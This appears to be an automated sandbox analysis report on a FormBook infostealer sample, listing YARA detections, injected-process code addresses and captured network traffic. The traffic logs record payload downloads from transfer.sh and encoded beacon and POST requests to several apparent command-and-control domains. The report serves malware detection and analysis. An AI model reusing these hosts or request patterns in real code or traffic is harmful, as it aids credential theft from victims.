      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.financestrategists.com/founder-spotlight/best-corporate-domain-registrar-independent-101
      Source: wlanext.exe, 00000003.00000002.572056583.0000000000858000.00000004.00000020.00020000.00000000.sdmp, d01F736L.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: wlanext.exe, 00000003.00000002.573551014.0000000003A7E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.skyepattest.com/obc0/?-Zbh98=7PSH/Ln00kiEZ
      Source: unknownHTTP traffic detected: POST /obc0/ HTTP/1.1Host: www.augusta.brokerConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.augusta.brokerUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.augusta.broker/obc0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 2d 5a 62 68 39 38 3d 28 6b 62 6b 54 46 49 4f 65 79 54 6e 50 79 62 42 63 47 42 6e 39 38 53 64 6e 35 32 4f 6a 53 32 6d 31 68 7e 71 46 79 4b 71 30 6c 65 30 75 46 51 75 39 61 4d 37 4c 5f 32 6f 56 45 68 37 37 39 37 66 73 76 78 6e 53 66 33 6b 54 42 43 6c 52 50 4a 33 75 2d 64 6f 6d 4f 6b 77 31 52 30 39 32 46 79 53 58 79 49 76 42 38 36 36 35 67 34 31 71 6a 74 45 52 39 69 59 4a 7a 6f 31 73 30 4b 61 69 4a 31 57 63 74 4b 6b 79 67 35 44 43 66 39 49 38 6a 53 6c 39 73 43 5a 4d 55 37 65 35 75 30 5a 31 6c 6f 57 61 32 4c 58 73 34 66 73 4e 51 34 64 79 69 64 75 55 77 75 6e 4f 33 28 4a 54 67 31 30 7a 75 6c 46 52 79 62 36 57 79 31 6a 42 50 41 6c 78 4f 6f 67 67 49 4c 72 6d 34 54 59 64 79 61 4c 59 46 71 59 61 6d 6c 35 30 67 56 6a 32 46 58 58 78 51 4f 42 68 50 78 4f 64 59 30 38 57 6a 36 63 47 68 5a 57 63 52 34 35 6f 32 71 59 28 33 64 6b 36 50 6c 59 58 68 38 43 5a 58 69 5f 47 46 72 6a 31 42 61 4d 77 76 65 55 4c 59 75 52 74 63 65 55 54 6d 72 50 73 7a 55 6d 4d 69 43 46 6a 62 4d 4c 4f 67 69 46 42 41 44 47 48 45 78 32 69 78 30 74 6e 65 53 4b 6f 45 6b 7a 46 4c 33 73 54 54 4b 6e 73 52 68 69 36 32 55 71 78 48 35 30 38 71 61 4b 62 4b 53 39 68 6d 44 4e 78 78 6b 4a 6c 31 76 38 38 63 73 2d 32 35 55 70 41 55 72 36 53 57 72 64 4b 32 79 4e 65 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: -Zbh98=(kbkTFIOeyTnPybBcGBn98Sdn52OjS2m1h~qFyKq0le0uFQu9aM7L_2oVEh7797fsvxnSf3kTBClRPJ3u-domOkw1R092FySXyIvB8665g41qjtER9iYJzo1s0KaiJ1WctKkyg5DCf9I8jSl9sCZMU7e5u0Z1loWa2LXs4fsNQ4dyiduUwunO3(JTg10zulFRyb6Wy1jBPAlxOoggILrm4TYdyaLYFqYaml50gVj2FXXxQOBhPxOdY08Wj6cGhZWcR45o2qY(3dk6PlYXh8CZXi_GFrj1BaMwveULYuRtceUTmrPszUmMiCFjbMLOgiFBADGHEx2ix0tneSKoEkzFL3sTTKnsRhi62UqxH508qaKbKS9hmDNxxkJl1v88cs-25UpAUr6SWrdK2yNeQ).
      Source: unknownDNS traffic detected: queries for: transfer.sh
      Source: global trafficHTTP traffic detected: GET /get/at0HRq/COOL2.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /get/NNwCGT/DLL.txt HTTP/1.1Host: transfer.sh
      Source: global trafficHTTP traffic detected: GET /obc0/?-Zbh98=V2kSpVpGpqmsc+zV99/vwEPQm6AjbD0sNlmHlMce7g5oKKN3NgpJQJsKfnUSGJnURE4hRqcigFYsP8mgf+TOZi6v6bw37RqyMQ==&C0=X82hHfExC6QP HTTP/1.1Host: www.negerbajs.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /obc0/?-Zbh98=ymzEQwRFXCPDCi+CRQJb7/Cu/KCeuwmnwGnTOFfe8Wu9oS0w58wfIKm/BUV3lMrC1MN0SKPFf3LORs93kZV7msxn8x5u5Wnabg==&C0=X82hHfExC6QP HTTP/1.1Host: www.augusta.brokerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /obc0/?-Zbh98=QEPeK6C4+xU1T+Zv89RyXnFvtkuTgj7CyQVR6lB98YiPEjAwu2VabqstxXG4WeniE5n6fSCr36EXz2ZAkGy4VKLMfvQeNDQPqw==&C0=X82hHfExC6QP HTTP/1.1Host: www.luregirl.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /obc0/?-Zbh98=MMZqO1I08y1GBRfD5BQQX3BCGY/GGPyfy+PmyLieMA7AvKnTbkXoUfvxfVWp1ohOvSFQ0Ck6defUcVisMCvldqUqNSR/syiy4w==&C0=X82hHfExC6QP HTTP/1.1Host: www.bloopacts.liveConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /obc0/?-Zbh98=7PSH/Ln00kiEZ+8VHNPsGnjemOaV3QQvmjWzLH8ChjGT6OrVSUax7xbhQJ4P9gQznTCEUU1HjkXGkkJ8y3lbGhe/UOddQQeZUw==&C0=X82hHfExC6QP HTTP/1.1Host: www.skyepattest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49699 version: TLS 1.2

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.399924782.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: aspnet_compiler.exe PID: 5020, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: wlanext.exe PID: 644, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
      Source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000002.571268092.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.399924782.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: aspnet_compiler.exe PID: 5020, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: wlanext.exe PID: 644, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeCode function: 0_2_00AA09710_2_00AA0971
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeCode function: 0_2_00AA43490_2_00AA4349
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119F9001_2_0119F900
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011B41201_2_011B4120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012510021_2_01251002
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011AB0901_2_011AB090
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012620A81_2_012620A8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C20A01_2_011C20A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012628EC1_2_012628EC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01262B281_2_01262B28
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CEBB01_2_011CEBB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125DBD21_2_0125DBD2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012622AE1_2_012622AE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01262D071_2_01262D07
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01190D201_2_01190D20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01261D551_2_01261D55
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C25811_2_011C2581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011AD5E01_2_011AD5E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012625DD1_2_012625DD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A841F1_2_011A841F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125D4661_2_0125D466
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01261FF11_2_01261FF1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011B6E301_2_011B6E30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125D6161_2_0125D616
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01262EF71_2_01262EF7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_004012A41_2_004012A4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0042019C1_2_0042019C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_004214211_2_00421421
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_004044C31_2_004044C3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_004044C71_2_004044C7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0040B5121_2_0040B512
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0040B5171_2_0040B517
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_004046E71_2_004046E7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0040FF471_2_0040FF47
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB28EC3_2_00CB28EC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BFB0903_2_00BFB090
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C120A03_2_00C120A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB20A83_2_00CB20A8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA10023_2_00CA1002
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CBE8243_2_00CBE824
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEF9003_2_00BEF900
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C041203_2_00C04120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB22AE3_2_00CB22AE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA03DA3_2_00CA03DA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CADBD23_2_00CADBD2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1EBB03_2_00C1EBB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB2B283_2_00CB2B28
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BF841F3_2_00BF841F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CAD4663_2_00CAD466
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB25DD3_2_00CB25DD
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C125813_2_00C12581
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BFD5E03_2_00BFD5E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE0D203_2_00BE0D20
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB1D553_2_00CB1D55
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB2D073_2_00CB2D07
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB2EF73_2_00CB2EF7
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CAD6163_2_00CAD616
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C06E303_2_00C06E30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CBDFCE3_2_00CBDFCE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB1FF13_2_00CB1FF1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0016E8103_2_0016E810
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_001689503_2_00168950
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017EA653_2_0017EA65
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0017FCEA3_2_0017FCEA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00162D903_2_00162D90
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00162D8C3_2_00162D8C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00169DDB3_2_00169DDB
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00169DE03_2_00169DE0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00162FB03_2_00162FB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0119B150 appears 35 times
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 00BEB150 appears 35 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_011D9910
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D99A0 NtCreateSection,LdrInitializeThunk,1_2_011D99A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9840 NtDelayExecution,LdrInitializeThunk,1_2_011D9840
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_011D9860
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_011D98F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_011D9A00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9A20 NtResumeThread,LdrInitializeThunk,1_2_011D9A20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9A50 NtCreateFile,LdrInitializeThunk,1_2_011D9A50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9540 NtReadFile,LdrInitializeThunk,1_2_011D9540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D95D0 NtClose,LdrInitializeThunk,1_2_011D95D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9710 NtQueryInformationToken,LdrInitializeThunk,1_2_011D9710
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9780 NtMapViewOfSection,LdrInitializeThunk,1_2_011D9780
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_011D97A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9FE0 NtCreateMutant,LdrInitializeThunk,1_2_011D9FE0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_011D9660
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_011D96E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9950 NtQueueApcThread,1_2_011D9950
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D99D0 NtCreateProcessEx,1_2_011D99D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D9820 NtEnumerateKey,1_2_011D9820
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011DB040 NtSuspendThread,1_2_011DB040
